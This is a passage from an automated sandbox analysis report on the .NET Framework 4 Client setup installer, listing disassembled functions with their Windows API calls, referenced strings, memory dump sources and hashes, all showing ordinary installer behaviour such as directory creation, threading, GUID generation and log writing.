                                                                                                                                                                      • Part of subcall function 000191D3: CreateDirectoryW.KERNEL32(00000000,?,?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?), ref: 00019273
                                                                                                                                                                      • Part of subcall function 000191D3: GetLastError.KERNEL32(?,?,00016F20,?,00000000,?,?,00000000,?,?,00015B53,?,?,?,?,?), ref: 0001927D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateDirectoryErrorLast$AttributesFile
                                                                                                                                                                    • String ID: X?f
                                                                                                                                                                    • API String ID: 925696554-1642154059
                                                                                                                                                                    • Opcode ID: 1afe118882c5534934998dbeb75c1966792391de6342ac66b830af6b28fbc223
                                                                                                                                                                    • Instruction ID: e9c25d9847d0c7023deab4257baabedb53d761379d1aa32f085ccfcdb5b062bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 1afe118882c5534934998dbeb75c1966792391de6342ac66b830af6b28fbc223
                                                                                                                                                                    • Instruction Fuzzy Hash: 83210137900202BBEB611B64DC65BFA36EAEF943A0F354029FD45D7051DA7ACEC29350
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000337AF Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 000337D4
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 000337E0
                                                                                                                                                                    • __getptd.LIBCMT ref: 000337ED
                                                                                                                                                                    • CreateThread.KERNELBASE(?,?,00033745,00000000,?,?), ref: 00033824
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 0003382E
                                                                                                                                                                    • _free.LIBCMT ref: 00033837
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00033842
                                                                                                                                                                      • Part of subcall function 0002B059: __getptd_noexit.LIBCMT ref: 0002B059
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 155776804-0
                                                                                                                                                                    • Opcode ID: 6a52e6af007c1ad93a84d91444e3ed87de97e5c3ab600e886a12b87497a944cf
                                                                                                                                                                    • Instruction ID: 0fb4fb11de056c88914c17a8436c0497cbb3d14d7db20976642412863178bec1
                                                                                                                                                                    • Opcode Fuzzy Hash: 6a52e6af007c1ad93a84d91444e3ed87de97e5c3ab600e886a12b87497a944cf
                                                                                                                                                                    • Instruction Fuzzy Hash: D31125726043166FE722AFA5FCC69DB3BDCDF05770B104425FA1497152DF71CA008661
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000168FB Relevance: 10.6, APIs: 7, Instructions: 55synchronizationwindowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0003BF10,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001691B
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(0003BF10,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001692C
                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00016940
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016952
                                                                                                                                                                    • DeleteCriticalSection.KERNEL32(0003BF10,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 0001696D
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 00016998
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,000163FA,?,00000000,00000002,?,?,?,?,?,?,?,00015B83,X?f), ref: 000169A4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$CloseHandle$DeleteEnterLeaveMessageObjectPostSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2807184951-0
                                                                                                                                                                    • Opcode ID: ad281c751e2e3e0d9971c124c21c1d5bac4ae61d026e327b3b0c9353284b5915
                                                                                                                                                                    • Instruction ID: 8dd0c3e25fb881344a839b0c6783bb9414c61542761a51840b683c988f3812ba
                                                                                                                                                                    • Opcode Fuzzy Hash: ad281c751e2e3e0d9971c124c21c1d5bac4ae61d026e327b3b0c9353284b5915
                                                                                                                                                                    • Instruction Fuzzy Hash: 91118E30900150DBF7678B69ED88CDA77EEB795751728460AF610F3224D7BE48C08F60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00033745 Relevance: 10.5, APIs: 7, Instructions: 39threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 0003374B
                                                                                                                                                                      • Part of subcall function 0002A57F: TlsGetValue.KERNEL32(?,00033750), ref: 0002A588
                                                                                                                                                                      • Part of subcall function 0002A57F: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,00033750), ref: 0002A59A
                                                                                                                                                                      • Part of subcall function 0002A57F: TlsSetValue.KERNEL32(00000000,?,00033750), ref: 0002A5A9
                                                                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 00033756
                                                                                                                                                                      • Part of subcall function 0002A555: TlsGetValue.KERNEL32(?,?,0003375B,00000000), ref: 0002A563
                                                                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 00033769
                                                                                                                                                                      • Part of subcall function 0002A5B8: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,?,?,0003376E,00000000,?,00000000), ref: 0002A5C9
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00033772
                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00033779
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0003377F
                                                                                                                                                                    • __freefls@4.LIBCMT ref: 0003379F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Value$DecodeInternal@4PointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3864649970-0
                                                                                                                                                                    • Opcode ID: 95e0b4155f522b89a92c03b95d43c594c67fb882f21d00026704fbd160b3521d
                                                                                                                                                                    • Instruction ID: bc902b596576bba78cbebe8e2295d28faf8a99610b084f8569c6d92690cec83d
                                                                                                                                                                    • Opcode Fuzzy Hash: 95e0b4155f522b89a92c03b95d43c594c67fb882f21d00026704fbd160b3521d
                                                                                                                                                                    • Instruction Fuzzy Hash: 21F062B4900660AFC719BF71E9498CFBBADAF493047108518F5048B213DE38D94286A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00019DC6 Relevance: 9.1, APIs: 6, Instructions: 112memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000038,00000000,?,00000000,?,00000008,00000008,?,00016163,?,?,?,00000000,00000000), ref: 00019E0D
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00016163,?,?,?,00000000,00000000), ref: 00019E14
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1617791916-0
                                                                                                                                                                    • Opcode ID: 1395625c5b7d56eb910706fb7b0e19394f9f3ca0da9d15b69780dba14cc5c7e4
                                                                                                                                                                    • Instruction ID: f43e6c44cbe4b59b7dd1281c06b4373b27e52a74c6fb68904ff34990f286b552
                                                                                                                                                                    • Opcode Fuzzy Hash: 1395625c5b7d56eb910706fb7b0e19394f9f3ca0da9d15b69780dba14cc5c7e4
                                                                                                                                                                    • Instruction Fuzzy Hash: 8031D2366002059FDF15DFA4C894ADA77E5AF84360B268429F9099F242EB75EC81CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B8D7 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 223COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 0001B9AC
                                                                                                                                                                    • _strcpy_s.LIBCMT ref: 0001B9BD
                                                                                                                                                                      • Part of subcall function 0001B580: __get_errno.LIBCMT ref: 0001B58E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __get_errno_memset_strcpy_s
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 179418724-2766056989
                                                                                                                                                                    • Opcode ID: 605acbeb8f46037ca42e8bfb19db844bb3352d6454acdee50fc170765d7ece9b
                                                                                                                                                                    • Instruction ID: 49f276a752ed8a28f9dcaf86883ebf10cc0e35b9070a27a9d1ae3a7ca6dedd86
                                                                                                                                                                    • Opcode Fuzzy Hash: 605acbeb8f46037ca42e8bfb19db844bb3352d6454acdee50fc170765d7ece9b
                                                                                                                                                                    • Instruction Fuzzy Hash: 698189B5504601AFC710EF64D88499AFBF4FF88324F108A1DF9999B262D771ED81CB92
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001746A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 00017496
                                                                                                                                                                    • UuidToStringW.RPCRT4(?,00000000), ref: 000174C3
                                                                                                                                                                    • RpcStringFreeW.RPCRT4(00000000), ref: 000174FF
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create a new GUID., xrefs: 000174B4
                                                                                                                                                                    • Failed to convert GUID to string., xrefs: 000174D7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: StringUuid$CreateFree
                                                                                                                                                                    • String ID: Failed to convert GUID to string.$Failed to create a new GUID.
                                                                                                                                                                    • API String ID: 3044360575-1364151769
                                                                                                                                                                    • Opcode ID: d34b0f824eded9b8a8b3467df63e91c42a0bb5e3dd2e1b7cacbceab3950d1f16
                                                                                                                                                                    • Instruction ID: 5f7d3ef53799f3dc9c29169406a71f98a50488f9069e30969bfcace7cc6d2a25
                                                                                                                                                                    • Opcode Fuzzy Hash: d34b0f824eded9b8a8b3467df63e91c42a0bb5e3dd2e1b7cacbceab3950d1f16
                                                                                                                                                                    • Instruction Fuzzy Hash: BA119672B1421AABDB109FF9DC45AEFB7F9AB48310F104435E605E3151DB78D8848B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000335E6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _malloc.LIBCMT ref: 00033600
                                                                                                                                                                      • Part of subcall function 0002CDB5: __FF_MSGBANNER.LIBCMT ref: 0002CDCE
                                                                                                                                                                      • Part of subcall function 0002CDB5: __NMSG_WRITE.LIBCMT ref: 0002CDD5
                                                                                                                                                                      • Part of subcall function 0002CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0002DBEB,?,00000001,?,?,0002D143,00000018,00036FA0,0000000C,0002D1D8), ref: 0002CDFA
                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 00033635
                                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0003364F
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 00033660
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                    • String ID: bad allocation
                                                                                                                                                                    • API String ID: 615853336-2104205924
                                                                                                                                                                    • Opcode ID: 9e73bc6a61cddae4e92fc84b75d5abf62e238a40288cca4e8fc36d9a468be667
                                                                                                                                                                    • Instruction ID: 6d3d4d75e7fcd03e0687f20339b8ed56e3e43c1cce74ce8f1f19729b8fb16694
                                                                                                                                                                    • Opcode Fuzzy Hash: 9e73bc6a61cddae4e92fc84b75d5abf62e238a40288cca4e8fc36d9a468be667
                                                                                                                                                                    • Instruction Fuzzy Hash: 53014932904619ABDB16FB68DC87AEE7BFC9F80318F14001AF60497192DBB88F45C340
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001870C Relevance: 7.6, APIs: 5, Instructions: 80filestringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000004,?,?,0003C170,?,?,?,?,000184C0,?,?,00000000,?,00018526,?), ref: 00018738
                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000004,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018762
                                                                                                                                                                    • WriteFile.KERNELBASE(00014DA4,00000002,00000004,00000000,?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170), ref: 00018787
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170,0003C170,00000032,%u/%u/%u, %u:%u:%u,?), ref: 0001878D
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,000184C0,?,?,00000000,?,00018526,?,[%s] ,0003C170,0003C170,00000032,%u/%u/%u, %u:%u:%u,?), ref: 000187BE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite$lstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3048800281-0
                                                                                                                                                                    • Opcode ID: 4b7e0da985b998245e54de9317e35e2ac7a8feaab19c8818a802bf020b3be1e8
                                                                                                                                                                    • Instruction ID: dbeaaceb142383e10be789d38f527c27b684b4dbd931977d70c4b3fb727d3b15
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b7e0da985b998245e54de9317e35e2ac7a8feaab19c8818a802bf020b3be1e8
                                                                                                                                                                    • Instruction Fuzzy Hash: 41211771900209FFDB119F66DC499EEBBB9EF44390F24C425E919DB150D639DB809B50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001BC8E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000335E6: _malloc.LIBCMT ref: 00033600
                                                                                                                                                                      • Part of subcall function 0001CA78: GetSystemInfo.KERNELBASE(?), ref: 0001CACB
                                                                                                                                                                    • _memset.LIBCMT ref: 0001BDC4
                                                                                                                                                                    • _strcpy_s.LIBCMT ref: 0001BDCE
                                                                                                                                                                    • _strcat_s.LIBCMT ref: 0001BDD8
                                                                                                                                                                      • Part of subcall function 0001B580: __get_errno.LIBCMT ref: 0001B58E
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoSystem__get_errno_malloc_memset_strcat_s_strcpy_s
                                                                                                                                                                    • String ID: W
                                                                                                                                                                    • API String ID: 3172754772-655174618
                                                                                                                                                                    • Opcode ID: 70fc79d1ec33d24d917198c8a106db9017c7b0c90d917bdf5edec812a8221e85
                                                                                                                                                                    • Instruction ID: 7e989f8df03db48ff08b92da858a476b1503db98be776c834ffa52edbacb4f3d
                                                                                                                                                                    • Opcode Fuzzy Hash: 70fc79d1ec33d24d917198c8a106db9017c7b0c90d917bdf5edec812a8221e85
                                                                                                                                                                    • Instruction Fuzzy Hash: 73916D31A00205EFCB15DFA9C884AEEBBF5AF89710F248559F505AB291EB71D981CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001768D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 000176D2
                                                                                                                                                                    • QueryDosDeviceW.KERNELBASE(?,?,00000400,?,00000000,?), ref: 000176EB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeviceQuery_memset
                                                                                                                                                                    • String ID: harddisk$ramdisk
                                                                                                                                                                    • API String ID: 2562551966-3524468269
                                                                                                                                                                    • Opcode ID: 0e9cf91bfa49111d4f1263d53482045229b80918ae1396bdb85e20d22f08b4ec
                                                                                                                                                                    • Instruction ID: ac962a917971d8e4d46f84e74ae1fb23a82fcc04caa6b1c4d4c142e5a28ef0f1
                                                                                                                                                                    • Opcode Fuzzy Hash: 0e9cf91bfa49111d4f1263d53482045229b80918ae1396bdb85e20d22f08b4ec
                                                                                                                                                                    • Instruction Fuzzy Hash: 1611E33AE04218AADB51DFB5EC01ADE73FCBF04314F1080A6E508E7141EA349B498B94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000165F9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000024,000164D8,?,0001654C,?,00000024,?,0001AFDF,00000007,?,?,00000000,00000000,?,?), ref: 00016616
                                                                                                                                                                    • SendMessageW.USER32(00008001,00000000,00000000,00000000), ref: 00016683
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to add file name on to status prefix: %S, xrefs: 00016654
                                                                                                                                                                    • %s..., xrefs: 0001668B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HandleMessageModuleSend
                                                                                                                                                                    • String ID: %s...$Failed to add file name on to status prefix: %S
                                                                                                                                                                    • API String ID: 1379669478-1181359081
                                                                                                                                                                    • Opcode ID: 9f4ca4de55be5eab228960ba1c6acc60e415be91212a4381590bc9b1f7f967e3
                                                                                                                                                                    • Instruction ID: 754825f0f2cc0b165dbba5f361323528bf87f8349fe1cbc59339ad0d49230f68
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f4ca4de55be5eab228960ba1c6acc60e415be91212a4381590bc9b1f7f967e3
                                                                                                                                                                    • Instruction Fuzzy Hash: 91119E71802214FFFF229B50DD46DEE7FBAAB12B48B104015F804B6022D77B9BD0AB94
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001ECDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
